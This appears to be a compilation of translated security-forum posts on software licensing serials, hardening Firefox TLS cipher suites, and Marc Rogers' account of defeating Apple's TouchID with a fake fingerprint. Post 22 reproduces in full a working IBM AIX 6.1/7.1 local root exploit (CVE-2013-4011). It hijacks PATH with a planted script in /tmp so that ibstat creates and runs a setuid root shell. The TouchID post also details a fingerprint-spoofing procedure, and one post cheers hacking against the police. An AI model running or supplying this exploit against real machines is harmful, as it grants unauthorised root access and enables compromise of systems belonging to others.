  20. The more complicated version:
     1. You create your own PKI
     2. You sign a certificate for each HWID
     3. You check that the user has that certificate (signed by your CA) for their HWID
     4. I don't know whether you should consider this option

     What an attacker does:
     1. Buys a valid serial for their HWID
     2. Publishes the serial together with the HWID
     3. Other people change their HWID (I think that's possible) and use the same serial
  21. Write an algorithm that turns the HWID into a "serial". For example, say you have the HWID "9005eefa-dad1-53b4-baab-56ecfbf9d55c". You could do this:
     1. Take the MD5 of the first part (9005eefa)
     2. Take the SHA1 of the last part (56ecfbf9d55c)
     3. base64 "dad1"
     4. rot13 "53b4"
     5. Hex-encode each character of "baab"
     6. Take the first 3 bytes of each, concatenate them and bang, you have a serial (in hex, for example)

     Those are just a few silly ideas, you can pick whatever methods you like. Of course, it can be cracked if somebody reverse-engineers the program, but in practice that is a problem with no solution: WHATEVER you do, it can still be cracked.
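The derivation sketched in posts 20 and 21, as an added Python example (this is not the poster's scheme): an HMAC-SHA256 over the canonicalised HWID, keyed with a vendor secret, truncated to 125 bits and formatted in a base32 alphabet with no ambiguous characters. The HWID is the one from the post; VENDOR_KEY is a placeholder. The failure mode described in post 20 is visible in verify_serial: the check passes on any machine that presents the leaked HWID/serial pair, and a client that embeds VENDOR_KEY can be reverse-engineered into a key generator, which is the poster's point that a client-side check can always be cracked. Keeping the key on a licensing server and having the client only store the serial it was issued moves the keygen problem off the client, but does nothing against a shared HWID.

```python
import hashlib
import hmac

# Vendor-side secret. PLACEHOLDER for this example. In a real product it should
# live only on the licensing server; anything compiled into the client can be
# recovered by reverse engineering.
VENDOR_KEY = b"example-vendor-key-do-not-ship"

# 32 symbols, no I/L/O/U so a serial read over the phone cannot be mistyped.
ALPHABET = "0123456789ABCDEFGHJKMNPQRSTVWXYZ"
GROUPS, GROUP_LEN = 5, 5          # 25 symbols * 5 bits = 125 bits of the MAC


def normalize_hwid(hwid):
    """Canonical form so 'ABC-123', ' abc-123 ' and 'abc-123' map to one serial."""
    return hwid.strip().lower().encode("ascii")


def make_serial(hwid, key=VENDOR_KEY):
    """Derive XXXXX-XXXXX-XXXXX-XXXXX-XXXXX from the HWID under the vendor key.
    HMAC, not a bare hash, so that knowing the derivation and the HWID is not
    enough to produce a serial: the key is required."""
    mac = hmac.new(key, normalize_hwid(hwid), hashlib.sha256).digest()
    n = int.from_bytes(mac[:16], "big")        # take the first 128 bits
    symbols = []
    for _ in range(GROUPS * GROUP_LEN):
        symbols.append(ALPHABET[n & 31])       # consume 5 bits per symbol
        n >>= 5
    s = "".join(symbols)
    return "-".join(s[i:i + GROUP_LEN] for i in range(0, len(s), GROUP_LEN))


def verify_serial(hwid, serial, key=VENDOR_KEY):
    """Recompute and compare in constant time. Note what this does NOT check:
    whether the HWID really belongs to this machine. Anyone who changes their
    HWID to a leaked one passes, exactly as post 20 describes."""
    expected = make_serial(hwid, key)
    return hmac.compare_digest(expected, serial.strip().upper())


if __name__ == "__main__":
    hwid = "9005eefa-dad1-53b4-baab-56ecfbf9d55c"     # HWID from the post
    serial = make_serial(hwid)
    print("serial for", hwid, "=", serial)
    print("owner check:   ", verify_serial(hwid, serial))
    print("other machine: ", verify_serial("00000000-0000-0000-0000-000000000000", serial))
    # The attacker of post 20: a leaked pair validates wherever the HWID is reused.
    print("leaked pair reused:", verify_serial(hwid, serial))
```

The 125-bit truncation is generous; a product that wants shorter keys can drop groups, but every 5 symbols removed is 25 bits less for an attacker to guess, and the key space should stay large enough that a serial cannot be found by brute force against the verification routine.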
22. [h=1]IBM AIX 6.1 / 7.1 - Local root Privilege Escalation[/h]

#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011

echo '
  mm   mmmmm  m    m
  ##     #     #  #
 #  #    #      ##
 #mm#    #     m""m
#    #  mm#mm  m"  "m
'
echo " [*] AIX root privilege escalation"
echo " [*] Kristian Erik Hermansen"
echo " [*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"

TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh

cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!

chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
  echo "[+] Access granted. Don't be evil..."
  ${RSHELL}
else
  echo "[-] Exploit failed. Try some 0day instead..."
fi

Source: IBM AIX 6.1 / 7.1 - Local root Privilege Escalation
23. Author: Nytro @ Romanian Security Team

Since rumours have appeared that the NSA does MITM (Man in The Middle) - in plain terms - intercepts Internet traffic to spy on what people do, we should inform ourselves a bit about how to keep our anonymity in the face of such problems. The article is aimed at people who use Mozilla; it does not assume the use of VPNs, I simply want to present a few settings you can make in the browser to increase safety in case someone tries to decrypt the traffic.

The first thing I recommend is to install this Firefox addon: https://addons.mozilla.org/ro/firefox/addon/calomel-ssl-validation/

Screenshot:

The addon is very useful in several respects:
1. It lets you see, in a very simple style, how strong the encryption used on the sites you visit is
2. It lets you see in detail how the encryption was done, awarding "points" for the algorithms used
3. It lets you make several useful settings

I started writing this article because Facebook, Google and other important sites, by default, offer very weak (symmetric) encryption: RC4 - 128 bits! More details about the RC4 algorithm and its problems can be found here: https://en.wikipedia.org/wiki/RC4#Security

Practically, the article boils down to how you can force Firefox to use stronger and safer algorithms.

How SSL/TLS works

I don't want this article to turn into an article about SSL/TLS, but I have to state a few basic things. SSL/TLS are protocols, more exactly sets of rules that have to be satisfied in order to establish a secure connection between your computer and the site you visit. TLS is practically an improved version of SSL. SSL versions 1.0, 2.0 and 3.0 are old and should no longer be used, especially since they are known to have security problems. TLS 1.0 is an improved version of SSL 3.0, and TLS 1.1 and TLS 1.2 are newer versions of TLS.

Establishing an SSL connection goes like this:
1. The TCP connection is established (I won't go into details)
2. The client (the browser) sends a "Client Hello" to the server. The request specifies: the SSL/TLS version, most often, by default, TLS 1.0. Example: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
   1. TLS = TLS or SSL, the protocol
   2. DHE = Diffie Hellman Exchange, the key exchange algorithm
   3. RSA = the algorithm used for authentication
   4. AES_256_CBC = the algorithm used for symmetric encryption (CBC is the mode in which the AES block algorithm is used)
   5. SHA = the algorithm used for validating data integrity (hash)
3. The server replies with a "Server Hello" in which it answers with the supported version, for example TLS 1.0, and with the chosen cipher suite (the algorithms used for encryption)
4. The server sends the certificate (or certificates) by which it identifies itself. More exactly, it says: "Look, this is the proof that I am www.cia.gov". And for the certificate to be recognised by the browser as valid, it must be signed by an authority in the field: VeriSign or other companies recognised as legitimate to sign certificates, because I too can create a certificate for the domain "www.cia.gov", but it will be signed by Nytro, not by VeriSign, and you probably trust them more than me.
5. The client checks whether the certificate is in order, and if everything is ok, the key exchange is done. That is, the asymmetric encryption takes place: the keys are exchanged using the RSA algorithm (I think the best one), DH (Diffie Hellman) or ECDH (DH on elliptic curves), depending on the cipher suite chosen by the server from the list sent by the client.
x. Using the keys exchanged above, the data is encrypted with the symmetric encryption algorithm (AES for example) using the keys exchanged at "Key exchange". The key sizes depend on the cipher suite.

For example, if AES with 128 bits is used, to "break" the sent data by brute force one has to try 2 ^ 128 (2 to the power 128) keys. If the algorithm is RC4, however, since there are many known attacks against this algorithm, there are much greater chances that such encryption can be broken in a much shorter time.

What can we do?

As I said, by default, browsers send the complete cipher-suite list and the server usually chooses a simple and fast algorithm like RC4, both for page load speed and for compatibility with older browsers. We can, however, force it to choose a stronger cipher by simply modifying the list of cipher suites the browser sends to the server, removing the "weak" cipher suites like RC4.

Settings in Mozilla

All SSL settings are made by navigating to the configuration page: about:config

For simplicity search for: security.ssl

Screenshot:

From here we can disable certain cipher suites. I cannot tell you with certainty which ones are secure and which are not, but I can recommend that you choose RSA (key exchange) and AES (256 bits). I disabled everything except RSA_AES_256_SHA:

You can also opt to use elliptic curves; apart from an elliptic-curve-based PRNG (Pseudo Random Number Generator) in which problems were found and which is suspected of being an NSA backdoor, and apart from the fact that the NSA collaborates with NIST (the ones who define the "security" standards) and could thus influence certain elliptic curves (which is why I said I prefer RSA), you can use elliptic curves because they are less CPU-intensive and "stronger".

The result

We close the browser, reopen it, and:

And we are SAFER.

Also, TLS 1.1 and TLS 1.2 are supported by Firefox starting with Firefox 24, but they are DISABLED by default (probably incompletely implemented). To enable them, in the "about:config" page search for: security.tls

And change the values:
- security.tls.version.min = 0 (SSL 3.0)
- security.tls.version.max = 1 (TLS 1.0)

to the values:
- security.tls.version.min = 1 (TLS 1.0)
- security.tls.version.max = 3 (TLS 1.2)

IMPORTANT: There is a possibility of having problems establishing TLS communication with older servers! In that case the only option is to re-enable some weaker cipher suites or to stop visiting that site.

If you have questions or problems I'll wait for them here.

Thanks, Nytro
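Splitting a cipher-suite name into the five roles the post lists for TLS_DHE_RSA_WITH_AES_256_CBC_SHA, and turning the post's advice (disable RC4, keep RSA with AES-256) into a check with user.js output, as an added example that is not part of the original post. The security.ssl3.* pref-name pattern is inferred from the post's RSA_AES_256_SHA and is an assumption.

```python
"""Added example, not code from the post: parse cipher-suite names into the
roles the post describes, flag RC4 suites, and emit user.js lines. Assumption:
the security.ssl3.* pref pattern is inferred from the post's RSA_AES_256_SHA."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class CipherSuite:
    protocol: str      # TLS or SSL
    key_exchange: str  # RSA, DHE, ECDHE, ...
    auth: str          # RSA, ECDSA, DSS, ... (plain RSA does both jobs)
    cipher: str        # bulk cipher with mode, e.g. AES_256_CBC or RC4_128
    mac: str           # integrity hash: MD5, SHA, SHA256 or SHA384

# "WITH" separates key exchange/authentication from bulk cipher and MAC.
_SUITE_RE = re.compile(r"^(TLS|SSL)_(.+?)_WITH_(.+)_(MD5|SHA|SHA256|SHA384)$")


def parse_suite(name: str) -> CipherSuite:
    """Map an IANA-style suite name onto the post's five components."""
    m = _SUITE_RE.match(name)
    if not m:
        raise ValueError(f"not a cipher-suite name: {name!r}")
    protocol, kx_auth, cipher, mac = m.groups()
    parts = kx_auth.split("_")
    # "RSA" alone: RSA does key exchange and authentication; "DHE_RSA" or
    # "ECDHE_ECDSA" name the key-exchange and authentication roles separately.
    key_exchange, auth = (parts[0], parts[-1]) if len(parts) > 1 else (parts[0], parts[0])
    return CipherSuite(protocol, key_exchange, auth, cipher, mac)


def key_bits(suite: CipherSuite) -> int:
    """Symmetric key length; the post's 2^128 for AES-128 is 2**key_bits."""
    for part in suite.cipher.split("_"):
        if part.isdigit():
            return int(part)
    return 168 if suite.cipher.startswith("3DES") else 0


def is_weak(suite: CipherSuite) -> bool:
    """The post's criterion: anything using RC4 should be disabled."""
    return suite.cipher.startswith("RC4")


def matches_post_policy(suite: CipherSuite) -> bool:
    """What the post leaves enabled: RSA key exchange with 256-bit AES."""
    return (not is_weak(suite) and suite.key_exchange == "RSA"
            and suite.cipher.startswith("AES_256"))


def user_js_line(name: str, enabled: bool) -> str:
    """user.js line for the suite's about:config pref (pattern is an assumption)."""
    body = name.split("_", 1)[1].replace("WITH_", "").replace("CBC_", "").lower()
    return f'user_pref("security.ssl3.{body}", {"true" if enabled else "false"});'


if __name__ == "__main__":
    # Constructed sample of suites a browser might offer in its Client Hello.
    for name in ["TLS_RSA_WITH_RC4_128_SHA", "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
                 "TLS_RSA_WITH_AES_256_CBC_SHA", "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"]:
        s = parse_suite(name)
        keep = matches_post_policy(s)
        print(f"{name}: {key_bits(s)}-bit, weak={is_weak(s)}, keep={keep}")
        print("  " + user_js_line(name, keep))
```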
24. As this verse says: Hacking is not a CRIME - And a special dedication from Nytro for all his enemies, for the cops everywhere!
25. Why I Hacked Apple’s TouchID, And Still Think It Is Awesome.
By Marc Rogers

By now, the news is out — TouchID was hacked. In truth, none of us really expected otherwise. Fingerprint biometrics use a security credential that gets left behind everywhere you go on everything you touch. The fact that fingerprints can be lifted is not really up for debate — CSI technicians have been doing it for decades. The big question with TouchID was whether or not Apple could implement a design that would resist attacks using lifted fingerprints, or whether they would join the long line of manufacturers who had tried but failed to implement a completely secure solution.

Does this mean TouchID is flawed and that it should be avoided? The answer to that isn’t as simple as you might think. Yes, TouchID has flaws, and yes, it’s possible to exploit those flaws and unlock an iPhone. But, the reality is these flaws are not something that the average consumer should worry about. Why? Because exploiting them was anything but trivial.

Hacking TouchID relies upon a combination of skills, existing academic research and the patience of a Crime Scene Technician. First you have to obtain a suitable print. A suitable print needs to be unsmudged and be a complete print of the correct finger that unlocks a phone. If you use your thumb to unlock it, the way Apple designed it, then you are looking for the finger which is least likely to leave a decent print on the iPhone. Try it yourself. Hold an iPhone in your hand and try the various positions that you would use the phone in. You will notice that the thumb doesn’t often come into full contact with the phone and when it does it’s usually in motion. This means they tend to be smudged. So in order to “hack” your phone a thief would have to work out which finger is correct AND lift a good clean print of the correct finger.

Next you have to “lift” the print. This is the realm of CSI. You need to develop the print using one of several techniques involving the fumes from cyanoacrylate (“super glue”) and a suitable fingerprint powder before carefully (and patiently) lifting the print using fingerprint tape. It is not easy. Even with a well-defined print, it is easy to smudge the result, and you only get one shot at this: lifting the print destroys the original.

So now what? If you got this far, the chances are you have a slightly smudged print stuck to a white card. Can you use this to unlock the phone? This used to work on some of the older readers, but not for many years now, and certainly not with this device. To crack this control you will need to create an actual fake fingerprint.

Creating the fake fingerprint is arguably the hardest part and by no means “easy.” It is a lengthy process that takes several hours and uses over a thousand dollars’ worth of equipment including a high resolution camera and laser printer. First of all, you have to photograph the print, remembering to preserve scale, maintain adequate resolution and ensure you don’t skew or distort the print. Next, you have to edit the print and clean up as much of the smudging as possible. Once complete, you have two options:

The CCC method. Invert the print in software, and print it out onto transparency film using a laser printer set to maximum toner density. Then smear glue and glycerol on the ink side of the print and leave it to cure. Once dried you have a thin layer of rubbery dried glue that serves as your fake print.

I used a technique demonstrated by Tsutomu Matsumoto in his 2002 paper “The Impact of Artificial “Gummy” Fingers on Fingerprint Systems”. In this technique, you take the cleaned print image and without inverting it, print it to transparency film. Next, you take the transparency film and use it to expose some thick copper clad photosensitive PCB board that’s commonly used in amateur electrical projects. After developing the image on the PCB using special chemicals, you put the PCB through a process called “etching” which washes away all of the exposed copper leaving behind a fingerprint mold. Smear glue over this and when it dries, you have a fake fingerprint.

Using fake fingerprints is a little tricky; I got the best results by sticking it to a slightly damp finger. My supposition is that this tactic improves contact by evening out any difference in electrical conductivity between this and the original finger.

So what do we learn from all this?

Practically, an attack is still a little bit in the realm of a John le Carré novel. It is certainly not something your average street thief would be able to do, and even then, they would have to get lucky. Don’t forget you only get five attempts before TouchID rejects all fingerprints, requiring a PIN code to unlock it.

However, let’s be clear, TouchID is unlikely to withstand a targeted attack. A dedicated attacker with time and resources to observe his victim and collect data is probably not going to see TouchID as much of a challenge. Luckily this isn’t a threat that many of us face.

TouchID is not a “strong” security control. It is a “convenient” security control. Today just over 50 percent of users have any PIN on their smartphones at all, and the number one reason people give for not using the PIN is that it’s inconvenient. TouchID is strong enough to protect users from casual or opportunistic attackers (with one concern I will cover later on) and it is substantially better than nothing.

Today, we have more sensitive data than ever before on our smart devices. To be honest, many of us should treat our smartphone like a credit card because you can perform many of the same financial transactions with it. Fingerprint security will help protect you against the three biggest threats facing smartphone users today:
- Fingerprint security will protect your data from a street thief that grabs your phone.
- Fingerprint security will protect you in the event you drop/forget/misplace your phone.
- Fingerprint security could protect you against phishing attacks (if Apple allows it).

Fingerprint security has a darker side though: we need to carefully evaluate how its data is going to be managed and the impact it will have on personal privacy. First and foremost is the question of how fingerprint data will be managed. As Senator Al Franken pointed out to Apple in his letter dated September 19, we only have ten fingerprints and a stolen or public fingerprint could lead to lifelong challenges. Just imagine your fingerprints turning up at every crime scene in the country! The big questions here are:
- What data does Apple capture from a finger as it is enrolled?
- How is this data stored and how is it accessed?
- Can this data be used to recreate a user’s fingerprint mathematically or through visual reconstruction?

In a similar fashion, fingerprints are viewed quite differently to passwords and PINs in the eyes of the law. For example, the police or other law enforcement officials can compel you to surrender your fingerprints, something they currently can’t do quite as easily with passwords or PINs despite some recent judicial challenges to that position.

As a technology, fingerprint biometrics has a flaw that’s likely to be repeatedly exposed and fixed in future products. We shouldn’t let this distract us or make us think that fingerprint biometrics should be abandoned; instead we should ensure that future products and services are designed with this in consideration. If we play to its strengths and anticipate its weaknesses, fingerprint biometrics can add great value to both security and user experience.

What I, and many of my colleagues, are waiting for (with bated breath) is TouchID enabled two-factor authentication. By combining two low to medium security tokens, such as a fingerprint and a 4 digit pin, you create something much stronger. Each of these tokens has its flaws and each has its strengths. Two-factor authentication allows you to benefit from those strengths while mitigating some of the weaknesses.

Imagine a banking application where on startup you use a fingerprint for convenience – it’s nice and quick and only needs to ensure the right person has started it. However as soon as you want to do something sensitive like check a balance or transfer some funds we kick it up a notch by asking for a two factor authentication – the fingerprint and a 4 digit pin. This combination is strong enough to protect the user against most scenarios from physical theft through to phishing attacks.

If implemented correctly, TouchID enabled two-factor authentication in enterprise applications could be a good defense against phishing attacks by attackers like the Syrian Electronic Army. You can trick a user into giving up any kind of passcode, but it is much harder to trick a user into giving up his or her fingerprints from the other side of the world.

Despite being hacked, TouchID is an exciting step forwards for smartphone security and I stand by our earlier blog on fingerprint security. Hacking TouchID gave me respect for its design and some ideas about how we can make it strong moving forward. I hope that Apple will keep in touch with the security industry as TouchID faces its inevitable growing pains. There is plenty of room for improvement, and an exciting road ahead of us if we do this right.

For starters, Apple — can we have two-factor authentication please?

Source: https://blog.lookout.com/blog/2013/09/23/why-i-hacked-apples-touchid-and-still-think-it-is-awesome/